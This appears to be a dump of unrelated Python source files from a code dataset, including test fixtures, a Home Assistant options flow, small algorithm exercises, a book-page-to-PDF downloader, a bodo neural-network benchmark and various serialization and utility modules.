    # bump up the timeouts to decrease chance of tests flaking due to race conditions
    config.network_retries = [0.1, 0.2, 0.3, 0.5, 0.5, 1, 1, 1, 1, 1, 1, 5]
    config.process_attempts = 10
    return config
@pytest.fixture
def project():
    """The ape test project."""
    return get_project()
@pytest.fixture
def network_api():
    """The local-development Ethereum network API."""
    return networks.ecosystems["ethereum"]["development"]
@pytest.fixture
def network_config(project):
    """A fresh hardhat network config (the `project` argument is unused in the
    body; it only forces the project fixture to be set up first)."""
    return get_network_config()
@pytest.fixture
def hardhat_provider(network_api, network_config):
    """A connected HardhatProvider instance for tests."""
    hh = HardhatProvider("hardhat", network_api, network_config, {}, Path("."), "")
    hh.connect()
    return hh
| StarcoderdataPython |
298620 | <reponame>copini/ha-sagemcom-fast
"""Options flow for Sagemcom integration."""
from homeassistant import config_entries
from homeassistant.const import CONF_SCAN_INTERVAL
import homeassistant.helpers.config_validation as cv
import voluptuous as vol
from .const import DEFAULT_SCAN_INTERVAL, MIN_SCAN_INTERVAL
class OptionsFlow(config_entries.OptionsFlow):
    """Handle a options flow for Sagemcom."""

    def __init__(self, config_entry):
        """Initialize Sagemcom options flow."""
        # Copy the entry's options so edits don't mutate the stored entry.
        self._options = dict(config_entry.options)

    async def async_step_init(self, user_input=None):
        """Manage the options."""
        if user_input is not None:
            # Form was submitted: persist the chosen options.
            return self.async_create_entry(title="", data=user_input)
        # Show the form pre-filled with the current (or default) scan
        # interval, clamped to the supported minimum.
        return self.async_show_form(
            step_id="init",
            data_schema=vol.Schema(
                {
                    vol.Optional(
                        CONF_SCAN_INTERVAL,
                        default=self._options.get(
                            CONF_SCAN_INTERVAL, DEFAULT_SCAN_INTERVAL
                        ),
                    ): vol.All(cv.positive_int, vol.Clamp(min=MIN_SCAN_INTERVAL))
                }
            ),
        )
| StarcoderdataPython |
1874367 | # Write a function which takes an array of numbers as input and returns the product of them all
# Example:
# product_of_array([1,2,3]) => 6
# product_of_array([1,2,3,4]) => 24
def product_of_array(arr):
    """Return the product of all numbers in *arr* (1 for an empty array)."""
    product = 1
    for value in arr:
        product *= value
    return product
if __name__ == '__main__':
    # Interactive driver: read the array length, then each element, and
    # print the product.
    arr_len = int(input('Input the length of array:'))
    arr = [0]*arr_len
    for i in range(arr_len):
        arr[i] = int(input(f"Enter element#{i}:"))
    print(product_of_array(arr))
| StarcoderdataPython |
5097576 | from pykechain.models.widgets.widget import Widget
from pykechain.models.widgets.widget_schemas import undefined_meta_schema
# UNDEFINED = 'UNDEFINED'
# PROPERTYGRID = 'PROPERTYGRID'
# SUPERGRID = 'SUPERGRID'
# HTML = 'HTML'
# FILTEREDGRID = 'FILTEREDGRID'
# SERVICE = 'SERVICE'
# NOTEBOOK = 'NOTEBOOK'
# ATTACHMENTVIEWER = 'ATTACHMENTVIEWER'
# TASKNAVIGATIONBAR = 'TASKNAVIGATIONBAR'
# JSON = 'JSON'
# METAPANEL = 'METAPANEL'
# MULTICOLUMN = 'MULTICOLUMN'
# SCOPE_WIDGET = 'SCOPE_WIDGET'
# THIRD_PARTY = 'THIRD_PARTY'
# PROGRESS = 'PROGRESS'
# SIGNATURE = 'SIGNATURE'
# CARD = 'CARD'
# WEATHER = 'WEATHER'
# DASHBOARD = 'DASHBOARD'
# SCOPEMEMBERS = 'SCOPEMEMBERS'
# Concrete widget types: each subclass only tags the KE-chain widget kind;
# all behaviour lives on the shared Widget base class.
class MetapanelWidget(Widget):
    """Metapanel Widget."""
class PropertygridWidget(Widget):
    """Propertygrid Widget."""
class UndefinedWidget(Widget):
    """Undefined Widget."""

    # Unknown widget types validate against the permissive undefined schema.
    schema = undefined_meta_schema
class FilteredgridWidget(Widget):
    """Filteredgrid Widget."""
class SupergridWidget(Widget):
    """Supergrid Widget."""
class AttachmentviewerWidget(Widget):
    """Attachmentviewer Widget."""
class TasknavigationbarWidget(Widget):
    """Tasknavigationbar Widget."""
class HtmlWidget(Widget):
    """HTML Widget."""
class ServiceWidget(Widget):
    """Service Widget."""
class NotebookWidget(Widget):
    """Notebook Widget."""
class JsonWidget(Widget):
    """JSON Widget."""
class MulticolumnWidget(Widget):
    """Multicolumn Widget."""
class ProgressWidget(Widget):
    """Progress bar Widget."""
class ScopeWidget(Widget):
    """Scope grid Widget."""
class SignatureWidget(Widget):
    """Signature Widget."""
class CardWidget(Widget):
    """Card Widget."""
class ThirdpartyWidget(Widget):
    """Thirdparty Widget."""
class TasksWidget(Widget):
    """Tasks Widget."""
class WeatherWidget(Widget):
    """Weather Widget."""
class ServicecardWidget(Widget):
    """ServiceCard Widget."""
class DashboardWidget(Widget):
    """Dashboard Widget."""
class ScopemembersWidget(Widget):
    """ScopeMembers Widget."""
| StarcoderdataPython |
1722954 | '''
The sum of the squares of the first ten natural numbers is,
12 + 22 + ... + 102 = 385
The square of the sum of the first ten natural numbers is,
(1 + 2 + ... + 10)2 = 552 = 3025
Hence the difference between the sum of the squares of the first ten natural numbers and the square of the sum is 3025 − 385 = 2640.
Find the difference between the sum of the squares of the first one hundred natural numbers and the square of the sum.
'''
# Project Euler 6: compute both quantities directly over 1..100.
sum_of_the_squares = sum(i ** 2 for i in range(101))
square_of_the_sum = sum(range(101))
# Report (square of the sum) - (sum of the squares).
print("The difference between the sum of the squares of the first one hundred natural numbers and the square of the sum is " + str(square_of_the_sum**2 - sum_of_the_squares))
| StarcoderdataPython |
5008672 | <reponame>ferhatelmas/algo
class Solution:
    def countGoodSubstrings(self, s: str) -> int:
        """Count the length-3 substrings of *s* whose characters are all distinct."""
        good = 0
        # Slide a window of three consecutive characters; zip ends naturally
        # when fewer than three characters remain.
        for a, b, c in zip(s, s[1:], s[2:]):
            if a != b and b != c and a != c:
                good += 1
        return good
| StarcoderdataPython |
1616594 | <gh_stars>1-10
import urllib.parse
import urllib.request
import os
import shutil
from PIL import Image
import img2pdf
def createPDF(bookInfo, startPage, endPage):
    """Download pages startPage..endPage of a book and assemble them into a PDF.

    *bookInfo* must provide 'Title', 'Key' (the page URL prefix), and
    'Image Format'. Page images are downloaded into a folder named after the
    title, flattened onto a white background, joined into Books/<Title>.pdf,
    and the temporary image folder is removed afterwards.
    """
    def directoryPath():
        # Folder that holds the downloaded page images.
        return f"{bookInfo['Title']}"
    def filePath(i):
        # Path of page *i*'s image inside the download folder.
        return directoryPath() + f"/{i}.{bookInfo['Image Format']}"
    def makeDirectory(name):
        # Create <cwd>/<name>, tolerating an already-existing folder.
        print("Creating directory...")
        try:
            currentPath = os.getcwd()
            os.mkdir(f"{currentPath}/{name}")
            print("Created directory.")
        except:
            # NOTE(review): bare except also hides permission errors, not
            # just "already exists" — confirm that is acceptable.
            print("Directory is already present.")
    def showProgress(blockNum, blockSize, totalSize):
        # urlretrieve-style progress hook.
        # NOTE(review): defined but never passed to urlretrieve below.
        percent = blockNum * blockSize / totalSize
        ending = " "
        if percent > 1:
            percent = 1
            ending = "\n"
        print("{:.0%}".format(percent), end=ending)
    def downloadPage(i, key):
        # Page URL = Key + page index + extension; the first page uses an
        # empty index (key == '').
        URL = bookInfo["Key"] + str(key) + "." + bookInfo["Image Format"]
        # print(f"Downloading page #{i+1} from: " + URL + "\n")
        print(f"Downloading page #{i+1}...")
        tries = 0
        maxTries = 10
        # Retry up to maxTries times; quote() escapes the URL, then the
        # scheme colon is restored ("%3A" -> ":").
        while tries < maxTries:
            try:
                # print(" Connection attempt #" + str(tries + 1))
                urllib.request.urlretrieve(urllib.parse.quote(URL).replace("%3A", ":"), filePath(i + 1))
                break
            except:
                tries += 1
    def makeBlankPageBackground(i):
        # Composite the page over opaque white so transparency becomes white.
        # NOTE(review): always re-saves as PNG even when 'Image Format'
        # differs — confirm img2pdf downstream handles that.
        path = filePath(i + 1)
        page = Image.open(path).convert('RGBA')
        background = Image.new('RGBA', page.size, (255,255,255))
        alphaComposite = Image.alpha_composite(background, page)
        alphaComposite.convert('RGB').save(path, "PNG")
    def manipulatePages():
        # Download and flatten every requested page in order.
        print("Beginning to download all pages...\n")
        for i in range(startPage - 1, endPage):
            if i == 0:
                k = ''
            else:
                k = i
            downloadPage(i, k)
            makeBlankPageBackground(i)
            print("")
    def makePDF():
        # Join the downloaded images into Books/<Title>.pdf.
        print("Making PDF File...")
        makeDirectory("Books")
        PDFPath = f"Books/{bookInfo['Title']}.pdf"
        with open(PDFPath, "wb") as PDFFile:
            pages = []
            for i in range(startPage - 1, endPage):
                pages.append(filePath(i + 1))
            PDFFile.write(img2pdf.convert(pages))
    makeDirectory(bookInfo['Title'])
    manipulatePages()
    makePDF()
    print("Finished! Your book is in the 'Books' folder")
    shutil.rmtree(directoryPath(), ignore_errors=True)
| StarcoderdataPython |
3444792 | <gh_stars>0
"""
Original code available at:
https://github.com/udacity/deep-learning-v2-pytorch/tree/master/
intro-neural-networks/student-admissions
# Predicting Student Admissions with Neural Networks
In this notebook, we predict student admissions to graduate school at UCLA
based on three pieces of data:
- GRE Scores (Test)
- GPA Scores (Grades)
- Class rank (1-4)
The dataset originally came from here: http://www.ats.ucla.edu/
## Loading the data
To load the data and format it nicely, we will use two very useful packages
called Pandas and Numpy. You can read on the documentation here:
- https://pandas.pydata.org/pandas-docs/stable/
- https://docs.scipy.org/
admit, gre, gpa, rank
int, int, float, int
"""
import time
from pathlib import Path
import bodo
import numpy as np
import pandas as pd
# local
from bodoai_examples.utils import bd_zip
def setup():
    """Write a 100x-enlarged copy of the bundled dataset to /tmp for benchmarking."""
    # bodo doesn't work well with pd.read_csv with compound path,
    # constant path works well.
    filename = 'student_data.csv'
    filepath = str(Path(__file__).parent / filename)
    data = pd.read_csv(filepath)
    print('Original data shape:', data.shape)
    # duplicate data just for benchmark purposes
    dfs = []
    for i in range(100):
        dfs.append(data)
    data = pd.concat(dfs).reset_index(drop=True)
    data.to_csv(str(Path('/tmp/') / filename), index=None)
    print('Replicated data shape:', data.shape)
# ======================================================
# Pure python/numpy
# ======================================================
def read_data():
    # Reading the csv file into a pandas DataFrame
    # (the fixed /tmp path is the copy written by setup()).
    return pd.read_csv('/tmp/student_data.csv')
# Activation (sigmoid) function
def sigmoid(x):
    """Logistic activation: squashes any real input into (0, 1)."""
    exp_neg = np.exp(-x)
    return 1 / (1 + exp_neg)
def sigmoid_prime(x):
    """Derivative of the sigmoid, written in terms of the activation value."""
    activation = sigmoid(x)
    return activation * (1 - activation)
def error_formula(y, output):
    """Binary cross-entropy between target *y* and predicted probability *output*."""
    return -(y * np.log(output) + (1 - y) * np.log(1 - output))
# Backpropagate the error
# Now it's your turn to shine. Write the error term. Remember that
# this is given by the equation (𝑦−𝑦̂ )𝜎′(𝑥)
def error_term_formula(x, y, output):
    """Backprop error term (y - y_hat) * sigmoid'(x) for one sample."""
    residual = y - output
    return residual * sigmoid_prime(x)
# Training function
def train_nn(features, targets, epochs, learnrate):
    """Train single-layer logistic-regression weights with batch gradient descent.

    features: DataFrame of inputs; targets: matching labels.
    Returns the learned weight vector.
    """
    # Use to same seed to make debugging easier
    np.random.seed(42)
    n_records, n_features = features.shape
    last_loss = None
    # Initialize weights
    weights = np.random.normal(
        0.0, scale=1 / n_features ** 0.5, size=n_features
    )
    for e in range(epochs):
        del_w = np.zeros(weights.shape)
        for x, y in zip(features.values, targets):
            # Loop through all records, x is the input, y is the target
            # Activation of the output unit
            # Notice we multiply the inputs and the weights here
            # rather than storing h as a separate variable
            output = sigmoid(np.dot(x, weights))
            # The error, the target minus the network output
            # error = error_formula(y, output)
            # The error term
            error_term = error_term_formula(x, y, output)
            # The gradient descent step, the error times the gradient times
            # the inputs
            del_w += error_term * x
        # Update the weights here. The learning rate times the
        # change in weights, divided by the number of records to average
        weights += learnrate * del_w / n_records
        # Printing out the mean square error on the training set
        # (every epochs/10 epochs).
        if e % (epochs / 10) == 0:
            out = sigmoid(np.dot(features, weights))
            loss = np.mean((out - targets) ** 2)
            print("Epoch:", e, end=', ')
            if last_loss and last_loss < loss:
                print("Train loss: ", loss, " WARNING - Loss Increasing")
            else:
                print("Train loss: ", loss)
            last_loss = loss
    print("Finished training!")
    print("=" * 50)
    return weights
def main():
    """Run the full numpy/pandas training pipeline and report test accuracy."""
    data = read_data()
    # One-hot encode the categorical rank column.
    one_hot_data = pd.get_dummies(data, columns=['rank'])
    # Scaling the data
    #
    # gre (roughly 200-800) and gpa (1.0-4.0) live on very different ranges,
    # which makes training harder, so both are scaled into [0, 1].
    # Making a copy of our data
    processed_data = one_hot_data[:]
    # Scale gre and gpa by their column maxima.
    processed_data['gre'] /= processed_data['gre'].max()
    processed_data['gpa'] /= processed_data['gpa'].max()
    # Splitting the data into Training and Testing
    #
    # 90/10 split; note the sample is unseeded, so the split varies per run.
    sample = np.random.choice(
        processed_data.index,
        size=int(len(processed_data) * 0.9),
        replace=False,
    )
    train_data, test_data = processed_data.iloc[sample], processed_data.drop(
        sample
    )
    print("Number of training samples is", len(train_data))
    print("Number of testing samples is", len(test_data))
    # Splitting the data into features (X) and targets (y).
    features = train_data.drop('admit', axis=1)
    targets = train_data['admit']
    features_test = test_data.drop('admit', axis=1)
    targets_test = test_data['admit']
    # Training the 2-layer Neural Network
    # Neural Network hyperparameters
    epochs = 1000
    learnrate = 0.5
    weights = train_nn(features, targets, epochs, learnrate)
    # Calculate accuracy on test data: a prediction is "admit" when the
    # sigmoid output exceeds 0.5.
    test_out = sigmoid(np.dot(features_test, weights))
    predictions = test_out > 0.5
    accuracy = np.mean(predictions == targets_test)
    print("Prediction accuracy: {:.3f}".format(accuracy))
# ======================================================
# with bodo
# ======================================================
@bodo.jit
def bd_read_data():
    # Reading the csv file into a pandas DataFrame
    # admit, gre, gpa, rank
    # int, int, float, int
    # (bodo needs explicit dtypes; the numeric columns are read as float64)
    return pd.read_csv(
        '/tmp/student_data.csv',
        dtype={
            'admit': np.float64,
            'gre': np.float64,
            'gpa': np.float64,
            'rank': np.int64,
        },
    )
# Activation (sigmoid) function
@bodo.jit
def bd_sigmoid(x):
    return 1 / (1 + np.exp(-x))
@bodo.jit
def bd_sigmoid_prime(x):
    # Derivative of the sigmoid.
    return bd_sigmoid(x) * (1 - bd_sigmoid(x))
@bodo.jit
def bd_error_formula(y, output):
    # Binary cross-entropy (kept for parity with the numpy version).
    return -y * np.log(output) - (1 - y) * np.log(1 - output)
# Backpropagate the error
# Now it's your turn to shine. Write the error term. Remember that
# this is given by the equation (𝑦−𝑦̂ )𝜎′(𝑥)
@bodo.jit
def bd_error_term_formula(x, y, output):
    return (y - output) * bd_sigmoid_prime(x)
# Training function
@bodo.jit
def bd_train_nn(features, targets, epochs, learnrate):
    """Bodo-jitted counterpart of train_nn; same algorithm, typed for bodo."""
    # Use to same seed to make debugging easier
    np.random.seed(42)
    n_records, n_features = features.shape
    # Numeric sentinel instead of None: the jitted code needs a typed value
    # here, so the "loss increasing" check is always armed from the start.
    last_loss = -9999999999.9
    # Initialize weights
    weights = np.random.normal(0.0, 1 / n_features ** 0.5, n_features)
    for e in range(epochs):
        del_w = np.zeros(weights.shape)
        # bd_zip is the project's bodo-compatible zip replacement.
        for x, y in bd_zip(features.values, targets):
            # Loop through all records, x is the input, y is the target
            # Activation of the output unit
            # Notice we multiply the inputs and the weights here
            # rather than storing h as a separate variable
            output = bd_sigmoid(np.dot(x, weights))
            # The error, the target minus the network output
            # error = bd_error_formula(y, output)
            # The error term
            error_term = bd_error_term_formula(x, y, output)
            # The gradient descent step, the error times the gradient times
            # the inputs
            del_w += error_term * x
        # Update the weights here. The learning rate times the
        # change in weights, divided by the number of records to average
        weights += learnrate * del_w / n_records
        # Printing out the mean square error on the training set
        if e % (epochs / 10) == 0:
            out = bd_sigmoid(np.dot(features.values, weights))
            loss = np.mean((out - targets) ** 2)
            msg = "Epoch:" + str(e) + ','
            if last_loss and last_loss < loss:
                print(msg, "Train loss: ", loss, " WARNING - Loss Increasing")
            else:
                print(msg, "Train loss: ", loss)
            last_loss = loss
    print("Finished training!")
    print("=" * 50)
    return weights
def bd_main():
    """Run the same pipeline as main(), using the bodo-jitted helpers."""
    # str(Path(__file__).parent / 'student_data.csv')
    data = bd_read_data()
    # One-hot encode rank; float64 keeps the frame uniformly typed for bodo.
    one_hot_data = pd.get_dummies(data, columns=['rank']).astype(np.float64)
    # Scaling the data
    #
    # gre and gpa live on very different ranges, so both are scaled to [0, 1].
    # Making a copy of our data
    processed_data = one_hot_data[:]
    # Scale gre and gpa by their column maxima.
    processed_data['gre'] /= processed_data['gre'].max()
    processed_data['gpa'] /= processed_data['gpa'].max()
    # Splitting the data into Training and Testing
    #
    # 90/10 split (unseeded, so the split varies per run).
    sample = np.random.choice(
        processed_data.index,
        size=int(len(processed_data) * 0.9),
        replace=False,
    )
    # reset_index keeps the split frames contiguous for bodo.
    train_data = processed_data.iloc[sample].reset_index(drop=True)
    test_data = processed_data.drop(sample).reset_index(drop=True)
    print("Number of training samples is", len(train_data))
    print("Number of testing samples is", len(test_data))
    # Splitting the data into features (X) and targets (y).
    features = train_data.drop('admit', axis=1)
    targets = train_data['admit']
    features_test = test_data.drop('admit', axis=1)
    targets_test = test_data['admit']
    # Training the 2-layer Neural Network
    # Neural Network hyperparameters
    epochs = 1000
    learnrate = 0.5
    weights = bd_train_nn(features, targets, epochs, learnrate)
    # Calculate accuracy on test data.
    test_out = bd_sigmoid(np.dot(features_test, weights))
    predictions = test_out > 0.5
    accuracy = np.mean(predictions == targets_test)
    print("Prediction accuracy: {:.3f}".format(accuracy))
if __name__ == '__main__':
    setup()
    # Time the pure python/numpy pipeline.
    t0 = time.time()
    main()
    t1 = time.time()
    print('=' * 50)
    print('Training time using pure python/numpy:', t1 - t0, 's')
    print('=' * 50)
    # Time the bodo-jitted pipeline (first call includes JIT compilation).
    t0 = time.time()
    bd_main()
    t1 = time.time()
    print('=' * 50)
    print('Training time using bodo:', t1 - t0, 's')
    print('=' * 50)
| StarcoderdataPython |
8141844 | # Generated by Django 2.1.2 on 2018-10-31 11:32
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated migration (Django 2.1.2): creates the User_Word table,
    # which records that a given user encountered a given word at a given time.
    # Do not hand-edit field definitions; generate a follow-up migration instead.

    dependencies = [
        # Use whatever model the project configured as AUTH_USER_MODEL.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('russian', '0003_auto_20181026_1250'),
    ]
    operations = [
        migrations.CreateModel(
            name='User_Word',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # word_number references a word by its number rather than a FK.
                ('word_number', models.IntegerField(verbose_name='Word Number')),
                ('time', models.DateTimeField(verbose_name='Time')),
                # Deleting the user cascades to their word records.
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
| StarcoderdataPython |
12809572 | <gh_stars>1-10
# stdlib
import dataclasses
from uuid import UUID
# third party
import sympc
from sympc.config import Config
from sympc.tensor import ReplicatedSharedTensor
# syft absolute
import syft
# syft relative
from ...generate_wrapper import GenerateWrapper
from ...lib.torch.tensor_util import protobuf_tensor_deserializer
from ...lib.torch.tensor_util import protobuf_tensor_serializer
from ...proto.lib.sympc.replicatedshared_tensor_pb2 import (
ReplicatedSharedTensor as ReplicatedSharedTensor_PB,
)
from ..python.primitive_factory import PrimitiveFactory
def object2proto(obj: object) -> ReplicatedSharedTensor_PB:
    """Serialize a ReplicatedSharedTensor into its protobuf message.

    The session UUID is encoded as a string ("" when the share is not yet
    attached to a session) and the Config dataclass is flattened to a dict
    before being serialized through syft's primitive machinery.
    """
    share: ReplicatedSharedTensor = obj

    # Unattached shares carry no session: encode an empty id and config.
    if share.session_uuid is None:
        session_uuid_syft = ""
        config = {}
    else:
        session_uuid_syft = str(share.session_uuid)
        config = dataclasses.asdict(share.config)

    conf_syft = syft.serialize(
        PrimitiveFactory.generate_primitive(value=config), to_proto=True
    )
    proto = ReplicatedSharedTensor_PB(session_uuid=session_uuid_syft, config=conf_syft)

    # Each underlying torch tensor is serialized individually.
    for tensor in share.shares:
        proto.tensor.append(protobuf_tensor_serializer(tensor))
    return proto
def proto2object(proto: ReplicatedSharedTensor_PB) -> ReplicatedSharedTensor:
    """Rebuild a ReplicatedSharedTensor from its protobuf message.

    When the message names a session, the config is taken from the live
    session (which must already exist locally); otherwise the config that
    was serialized alongside the shares is used.

    :raises ValueError: if the referenced session cannot be found.
    """
    if proto.session_uuid:
        session = sympc.session.get_session(proto.session_uuid)
        if session is None:
            raise ValueError(f"The session {proto.session_uuid} could not be found")
        config = dataclasses.asdict(session.config)
    else:
        config = syft.deserialize(proto.config, from_proto=True)

    tensors = [protobuf_tensor_deserializer(t) for t in proto.tensor]

    share = ReplicatedSharedTensor(shares=None, config=Config(**config))
    if proto.session_uuid:
        share.session_uuid = UUID(proto.session_uuid)
    share.shares = tensors
    return share
# Register the serialize/deserialize pair with syft so that
# ReplicatedSharedTensor instances can be sent over the wire as protobufs.
GenerateWrapper(
    wrapped_type=ReplicatedSharedTensor,
    import_path="sympc.tensor.ReplicatedSharedTensor",
    protobuf_scheme=ReplicatedSharedTensor_PB,
    type_object2proto=object2proto,
    type_proto2object=proto2object,
)
| StarcoderdataPython |
11230813 | <filename>emscore/__init__.py
# Package version; keep in sync with the distribution metadata.
__version__ = "0.0.1"
# Re-export the scorer module's public API at package level.
from .scorer import *
| StarcoderdataPython |
1711682 | from pathlib import Path
# Repository root: two directory levels above this file. resolve(strict=True)
# raises immediately if the file is missing, surfacing broken installs early.
BASE_DIR = Path(__file__).resolve(strict=True).parent.parent
# The bundled Godot project that the script runner operates on.
GODOT_PROJECT = BASE_DIR.joinpath('script_runner', 'project')
# Python package name and GDNative library resource filename.
PYTHON_PACKAGE = 'script_runner'
GDNATIVE_LIBRARY = 'script_runner.gdnlib'
| StarcoderdataPython |
9750845 | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Template placeholder tokens substituted into generated workflow files.
ACR_PLACEHOLDER = 'container_registry_name_place_holder'
APP_NAME_PLACEHOLDER = 'app_name_place_holder'
PORT_NUMBER_PLACEHOLDER = 'port_number_place_holder'
CLUSTER_PLACEHOLDER = 'cluster_name_place_holder'
RG_PLACEHOLDER = 'resource_name_place_holder'
# Defaults used when the caller supplies no explicit values.
PORT_NUMBER_DEFAULT = '8080'
APP_NAME_DEFAULT = 'k8sdemo'
RELEASE_NAME = 'aksappupdemo'
# Checkin (commit) message strings for the generated workflows.
CHECKIN_MESSAGE_AKS = 'Setting up AKS deployment workflow'
CHECKIN_MESSAGE_FUNCTIONAPP = 'Setting up Functionapp deployment workflow'
RELEASE_PLACEHOLDER = 'release_name_place_holder'
| StarcoderdataPython |
5181583 | # Copyright 2011 <NAME> <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Python compatibility wrappers."""
from struct import pack
def byte(num: int) -> bytes:
    """
    Pack *num* into its single-byte (base-256) representation.

    Values outside the unsigned byte range are rejected by ``struct``
    itself (struct.error), so no explicit bounds check is needed here.

    :param num:
        An unsigned integer between 0 and 255 (both inclusive).
    :returns:
        A bytes object of length one.
    """
    return pack("B", num)
def xor_bytes(b1: bytes, b2: bytes) -> bytes:
    """
    Bitwise-XOR two bytes objects element by element, b1 ^ b2.

    XOR is commutative, so the argument order is irrelevant. When the
    inputs differ in length, the surplus tail of the longer one is
    dropped (pairing stops at the shorter input).

    :param b1:
        First bytes object.
    :param b2:
        Second bytes object.
    :returns:
        Bytes object of length ``min(len(b1), len(b2))``.
    """
    result = bytearray()
    for left, right in zip(b1, b2):
        result.append(left ^ right)
    return bytes(result)
| StarcoderdataPython |
9753655 | import numpy
from numpy.testing import assert_allclose
import theano
from theano import tensor
from theano import function
from blocks.bricks import Softmax
from blocks.bricks.cost import CategoricalCrossEntropy
def test_softmax_vector():
    """Naive crossentropy-of-softmax must agree with the fused, numerically
    stable version when targets are integer class labels (one per row)."""
    inp = tensor.matrix('x')
    labels = tensor.lvector('y')

    naive_cost = CategoricalCrossEntropy().apply(labels, Softmax().apply(inp))
    stable_cost = Softmax().categorical_cross_entropy(labels, inp)

    naive_fn = function([inp, labels], naive_cost)
    stable_fn = function([inp, labels], stable_cost)

    batch_size = 100
    x_size = 10
    inp_val = numpy.asarray(numpy.random.randn(batch_size, x_size),
                            dtype=theano.config.floatX)
    label_val = numpy.random.randint(low=0, high=x_size,
                                     size=(batch_size)).astype(int)

    assert_allclose(naive_fn(inp_val, label_val),
                    stable_fn(inp_val, label_val))
def test_softmax_matrix():
    """Naive crossentropy-of-softmax must agree with the fused, numerically
    stable version when targets are full probability distributions."""
    inp = tensor.matrix('x')
    target = tensor.matrix('y')

    naive_cost = CategoricalCrossEntropy().apply(target, Softmax().apply(inp))
    stable_cost = Softmax().categorical_cross_entropy(target, inp)

    naive_fn = function([inp, target], naive_cost)
    stable_fn = function([inp, target], stable_cost)

    batch_size = 2
    x_size = 2
    inp_val = numpy.asarray(numpy.random.randn(batch_size, x_size),
                            dtype=theano.config.floatX)
    raw = numpy.array(numpy.random.uniform(size=(batch_size, x_size)),
                      dtype=theano.config.floatX)
    # Normalise each row so the targets are valid probability distributions.
    target_val = raw / numpy.expand_dims(raw.sum(axis=1), axis=1)

    assert_allclose(naive_fn(inp_val, target_val),
                    stable_fn(inp_val, target_val))
| StarcoderdataPython |
3450382 | from pygears.core.gear import alternative, gear
from pygears.typing import Uint
from pygears.util.hof import oper_tree
@gear(enablement=b'len(din) == 2')
def eq(*din,
       din0_signed=b'typeof(din0, Int)',
       din1_signed=b'typeof(din1, Int)') -> Uint[1]:
    """Two-input equality comparator gear producing a single-bit result.

    The body is intentionally empty: pygears resolves this gear at compile
    time (the ``b'...'`` values are pygears compile-time expressions, not
    runtime defaults) — presumably mapping to an HDL primitive; the
    ``enablement`` condition restricts this variant to exactly two inputs.
    """
    pass
@alternative(eq)
@gear
def eq_vararg(*din, enablement=b'len(din) > 2') -> Uint[1]:
    """Variadic alternative of ``eq`` for more than two inputs, composed as
    a tree of two-input ``eq`` gears via ``oper_tree``.

    NOTE(review): a tree of pairwise ``eq`` compares comparison *results*
    at inner nodes rather than the original operands — confirm oper_tree's
    reduction semantics match the intended "all inputs equal" meaning.
    """
    return oper_tree(din, eq)
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.